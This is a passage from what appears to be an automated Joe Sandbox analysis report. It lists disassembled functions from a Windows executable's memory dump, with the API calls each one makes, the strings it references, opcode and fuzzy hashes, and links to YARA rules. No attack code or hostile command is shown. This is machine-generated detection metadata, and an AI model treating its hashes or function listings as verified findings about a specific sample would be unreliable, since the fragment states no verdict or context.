                                                • Instruction Fuzzy Hash: 4B11E631E01114ABCB20DB58D884B9D77BAAB65300F140163EC15EB3A2D738AD07D7A1
                                                Function 007E22EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007E2342
                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007E236B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Internet$OpenOption
                                                • String ID: <local>
                                                • API String ID: 942729171-4266983199
                                                • Opcode ID: 2f831266a84a60b63d87a8f428dbcaaf14af9d94af57d35422c77cfe99c64cbc
                                                • Instruction ID: 8c005c6088132c0ae3efa28c5fe7ed93ed0fd66391ed7ac54eb598f802de64b7
                                                • Opcode Fuzzy Hash: 2f831266a84a60b63d87a8f428dbcaaf14af9d94af57d35422c77cfe99c64cbc
                                                • Instruction Fuzzy Hash: D411E0701022A5BADB248F138C84EBBFB6CFF0A355F10812AF94552001D27C6882CAF0
                                                Function 007C90C7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                  • Part of subcall function 007CAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 007CAEC7
                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007C9135
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: 70005128da24dd173765ae4f9a034856af8f1724114839296c80c34d2d99e347
                                                • Instruction ID: dc66e7ecca5271a7cd5aa8c9c1c2a3bb9b705eee2643869215b5b6d8240b0fc1
                                                • Opcode Fuzzy Hash: 70005128da24dd173765ae4f9a034856af8f1724114839296c80c34d2d99e347
                                                • Instruction Fuzzy Hash: 0901D231A05219EBCF04AB64CC9ADFE7769EF06360B14465DF836572C1EA3D5908C650
                                                Function 007C8FBF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                  • Part of subcall function 007CAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 007CAEC7
                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 007C902D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: 5e1d4bd202b82500a7a7ec9227dc4ab0c5a4798ec31956f6a93285c93b4abf63
                                                • Instruction ID: bf5a624f1fe0877327fc281d08b57832d3615e57b13f7e826af19190f8349aa6
                                                • Opcode Fuzzy Hash: 5e1d4bd202b82500a7a7ec9227dc4ab0c5a4798ec31956f6a93285c93b4abf63
                                                • Instruction Fuzzy Hash: 9201F771A41109EBCF14E7A0CD9BEFE77A8EF05340F24412DB916A3281DE2D5E08D2B1
                                                Function 007C9044 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                  • Part of subcall function 007CAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 007CAEC7
                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 007C90B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: 50c46f28db0b4735b65e7eb21b09cf17cbd20bc4cf9882683b03f32e0796e049
                                                • Instruction ID: 5ef472e5859bf9ede4f3c0ad755a798f3718cd78088f57bde152658e9cdf7139
                                                • Opcode Fuzzy Hash: 50c46f28db0b4735b65e7eb21b09cf17cbd20bc4cf9882683b03f32e0796e049
                                                • Instruction Fuzzy Hash: 6C01F271A41109ABCF04E7A4C98AFFE77A8DF04340F24412DB916A3282DE2D5E09D2B6
                                                Function 007D4FCF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ClassName_wcscmp
                                                • String ID: #32770
                                                • API String ID: 2292705959-463685578
                                                • Opcode ID: 1de275fcd1374598e50dc36ef61398a9d299f360f4f21d7e9d290f8e3e6585c7
                                                • Instruction ID: f30f751b7bc83ee3789a312a9a112684e6d54c2d2c9efcd78a448992d04a6e07
                                                • Opcode Fuzzy Hash: 1de275fcd1374598e50dc36ef61398a9d299f360f4f21d7e9d290f8e3e6585c7
                                                • Instruction Fuzzy Hash: 01E0D8326042296BDB20ABA9AC09FA7F7BCFB45771F000067FD04D3151E9649A5587F5
                                                Function 007AB441 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007AB494: _memset.LIBCMT ref: 007AB4A1
                                                  • Part of subcall function 00790AC0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007AB470,?,?,?,0077100A), ref: 00790AC5
                                                • IsDebuggerPresent.KERNEL32(?,?,?,0077100A), ref: 007AB474
                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0077100A), ref: 007AB483
                                                Strings
                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007AB47E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                • API String ID: 3158253471-631824599
                                                • Opcode ID: 9e29caf516df870aa06ce331ea6aa22771c5faa2e1a82d16d3c480e3846634d2
                                                • Instruction ID: f9b5f7a6b341e4169233b6de400868271bee57d6b8269bf8b72b97df8d9a2cbe
                                                • Opcode Fuzzy Hash: 9e29caf516df870aa06ce331ea6aa22771c5faa2e1a82d16d3c480e3846634d2
                                                • Instruction Fuzzy Hash: 5FE039702007508AD7209F64E4086467BE4FF44314F018A2CE446C2342EBBC9444CBA1
                                                Function 007B1C8E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?), ref: 007B1ACE
                                                  • Part of subcall function 007EC104: LoadLibraryA.KERNEL32(kernel32.dll,?,007B1CB7,?), ref: 007EC112
                                                  • Part of subcall function 007EC104: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007EC124
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 007B1CC6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                • String ID: WIN_XPe
                                                • API String ID: 582185067-3257408948
                                                • Opcode ID: 94ccc343a2b8a20489eee325dd28f7bc122a98bfd4a35da39ded072f6a7b2273
                                                • Instruction ID: bc93f69aac6f6dfbdd160ca4667e266f7fc36cdf980de3eaeb985e43ff74da57
                                                • Opcode Fuzzy Hash: 94ccc343a2b8a20489eee325dd28f7bc122a98bfd4a35da39ded072f6a7b2273
                                                • Instruction Fuzzy Hash: 78F0ED70802109DFDB15DB95C998BECBBF8BF08304FA48095E102A2551DB795F44DF64
                                                Function 007F59CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007F59D7
                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007F59EA
                                                  • Part of subcall function 007D52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5363
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                • Opcode ID: 9ea93c06fe8811d5072bbf44deac33d4500c0f7b00a7f346e36ba676f2fc46a8
                                                • Instruction ID: c57ed269f340d6727c991f744c7f945863d3fc8854da76bf75385584a5fedb21
                                                • Opcode Fuzzy Hash: 9ea93c06fe8811d5072bbf44deac33d4500c0f7b00a7f346e36ba676f2fc46a8
                                                • Instruction Fuzzy Hash: D5D0C931384311B7E664AB70AC0FFA66A24BF10B50F004825F255EA2D0CDE8A844C658
                                                Function 007F5A01 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007F5A17
                                                • PostMessageW.USER32(00000000), ref: 007F5A1E
                                                  • Part of subcall function 007D52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5363
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                • Opcode ID: 05d979277e4f2a237ed92d65ef870d43963e6860db0a5cb6512ddbff4008a406
                                                • Instruction ID: 876c28fde8d882439fec655f6a759383d3edafb74cf3f6b77eb3d958216fbeaa
                                                • Opcode Fuzzy Hash: 05d979277e4f2a237ed92d65ef870d43963e6860db0a5cb6512ddbff4008a406
                                                • Instruction Fuzzy Hash: 76D0C931381311BBE664AB70AC0FFA66624BB14B50F004825F255EA2D0CDE8A844C658